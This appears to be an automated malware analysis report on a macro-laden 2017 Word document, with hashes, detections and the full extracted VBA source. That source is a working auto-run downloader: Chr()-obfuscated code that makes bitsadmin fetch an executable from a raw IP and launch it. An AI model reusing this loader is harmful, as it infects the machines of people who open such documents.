Office (OOXML) malware analysis — malicious · cd391b8ecc5845cd

MALICIOUS

Office (OOXML)

176.8 KB Created: 2017-03-08 23:05:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2017-03-27

MD5: 8bd3679a6159184b80d8c1ee5b0eb144 SHA-1: 741f063b194e8570a9746259724c17a9f27c4ec3 SHA-256: cd391b8ecc5845cd22775be9b763d87342c3d7156ded9eab3bac696511ceed21

270 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter

The sample is an OOXML document containing obfuscated VBA macros. Heuristics indicate the presence of an auto-exec loader that uses CreateObject and Shell functions, suggesting it attempts to download and execute a second-stage payload. The VBA script attempts to construct the string 'cmd.exe /c rundll32.exe' which is then likely used to execute a malicious payload.

Heuristics 6

ClamAV: Doc.Macro.ObfuscatedChr-6203136-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.ObfuscatedChr-6203136-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
 Shell Ahakoq, vbNormalFocus
End Sub
```
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
Sub Akvil()
  Application.Run "Esev"
End Sub
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Sub Document_Open()
  Call Akvil
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	4671 bytes
SHA-256: `63d308724edea04a35fda37cacabf421a3b9ddac54a67d2971fb758348db57ef`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Akvil() Application.Run "Esev" End Sub Function Efen() Dim Ahakoq As String Efen = Inak(99) & Inak(109) & Inak(100) & Inak(46) & Inak(101) & Inak(120) & Inak(101) & Inak(32) & Inak(47) & Inak(99) End Function Function Aduwq() Dim Ahakoq As String Aduwq = Inak(32) & Inak(34) & Inak(119) & Inak(97) & Inak(105) & Inak(116) & Inak(102) & Inak(111) & Inak(114) & Inak(32) End Function Function Yhjac() Dim Ahakoq As String Yhjac = Inak(47) & Inak(116) & Inak(32) & Inak(49) & Inak(50) & Inak(32) & Inak(85) & Inak(108) & Inak(117) End Function Function Yhaw() Dim Ahakoq As String Yhaw = Inak(98) & Inak(121) & Inak(32) & Inak(38) & Inak(32) & Inak(98) & Inak(105) & Inak(116) & Inak(115) End Function Function Agulh() Dim Ahakoq As String Agulh = Inak(97) & Inak(100) & Inak(109) & Inak(105) & Inak(110) & Inak(32) & Inak(47) & Inak(116) & Inak(114) End Function Function Ohuw() Dim Ahakoq As String Ohuw = Inak(97) & Inak(110) & Inak(115) & Inak(102) & Inak(101) & Inak(114) & Inak(32) & Inak(109) & Inak(121) End Function Function Uregkaxr() Dim Ahakoq As String Uregkaxr = Inak(106) & Inak(111) & Inak(98) & Inak(32) & Inak(47) & Inak(100) & Inak(111) & Inak(119) & Inak(110) End Function Function Ylyvf() Dim Ahakoq As String Ylyvf = Inak(108) & Inak(111) & Inak(97) & Inak(100) & Inak(32) & Inak(47) & Inak(112) & Inak(114) & Inak(105) End Function Function Ypuhw() Dim Ahakoq As String Ypuhw = Inak(111) & Inak(114) & Inak(105) & Inak(116) & Inak(121) & Inak(32) & Inak(110) & Inak(111) & Inak(114) End Function Function Efen0() Dim Ahakoq As String Efen0 = Inak(109) & Inak(97) & Inak(108) & Inak(32) & Inak(104) & Inak(116) & Inak(116) & Inak(112) & Inak(58) End Function Function Efen1() Dim Ahakoq As String Efen1 = Inak(47) & Inak(47) & Inak(49) & Inak(56) & Inak(53) & Inak(46) & Inak(49) & Inak(48) & Inak(48) End Function Function Efen2() Dim Ahakoq As String Efen2 = Inak(46) & Inak(50) & Inak(50) & Inak(50) & Inak(46) & Inak(50) & Inak(57) & Inak(47) & Inak(97) End Function Function Efen3() Dim Ahakoq As String Efen3 = Inak(112) & Inak(112) & Inak(100) & Inak(97) & Inak(116) & Inak(97) & Inak(47) & Inak(109) & Inak(111) End Function Function Efen4() Dim Ahakoq As String Efen4 = Inak(122) & Inak(105) & Inak(108) & Inak(108) & Inak(97) & Inak(47) & Inak(102) & Inak(105) & Inak(114) End Function Function Efen5() Dim Ahakoq As String Efen5 = Inak(101) & Inak(102) & Inak(111) & Inak(120) & Inak(46) & Inak(101) & Inak(120) & Inak(101) & Inak(32) End Function Function Efen6() Dim Ahakoq As String Efen6 = Inak(37) & Inak(97) & Inak(112) & Inak(112) & Inak(100) & Inak(97) & Inak(116) & Inak(97) & Inak(37) End Function Function Efen7() Dim Ahakoq As String Efen7 = Inak(92) & Inak(73) & Inak(104) & Inak(101) & Inak(99) & Inak(46) & Inak(101) & Inak(120) & Inak(101) End Function Function Efen8() Dim Ahakoq As String Efen8 = Inak(32) & Inak(38) & Inak(115) & Inak(116) & Inak(97) & Inak(114) & Inak(116) & Inak(32) & Inak(37) End Function Function Efen9() Dim Ahakoq As String Efen9 = Inak(97) & Inak(112) & Inak(112) & Inak(100) & Inak(97) & Inak(116) & Inak(97) & Inak(37) & Inak(92) End Function Function Aduwq0() Dim Ahakoq As String Aduwq0 = Inak(73) & Inak(104) & Inak(101) & Inak(99) & Inak(46) & Inak(101) & Inak(120) & Inak(101) & Inak(34) End Function Function Inak(Ynymhuw As Integer) Inak = Chr(Ynymhuw) End Function Sub Esev() Dim Ahakoq As String Dim vbNormalFocus As Long vbNormalFocus = 0 Ahakoq = Efen() & Aduwq() & Yhjac() & Yhaw() & Agulh() & Ohuw() Ahakoq = Ahakoq & Uregkaxr() & Ylyvf() & Ypuhw() Ahakoq = Ahakoq & Efen0() & Efen1() Ahakoq = Ahakoq & Efen2() & Efen3() Ahakoq = Ahakoq & Efen4() & Efen5() Ahakoq = Ahakoq & Efen6() Ahakoq = Ahakoq & Efen7() Ahakoq = Ahakoq & Efen8() & Efen9() & Aduwq0() Shell Ahakoq, vbNormalFocus End Sub Sub Document_Open() Call Akvil End Sub Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{6DB7DF7C-8716-4781-B0B6-C390D1E0A454}{9C0C5990-23F9-4DB0-9929-001760CD1147}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	20480 bytes
SHA-256: `bbf71c0e2669283ab80f56dade6760b647bfc040d6f5e5412096bf90c0f35f4b`
Detection ClamAV: Doc.Macro.ObfuscatedChr-6203136-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.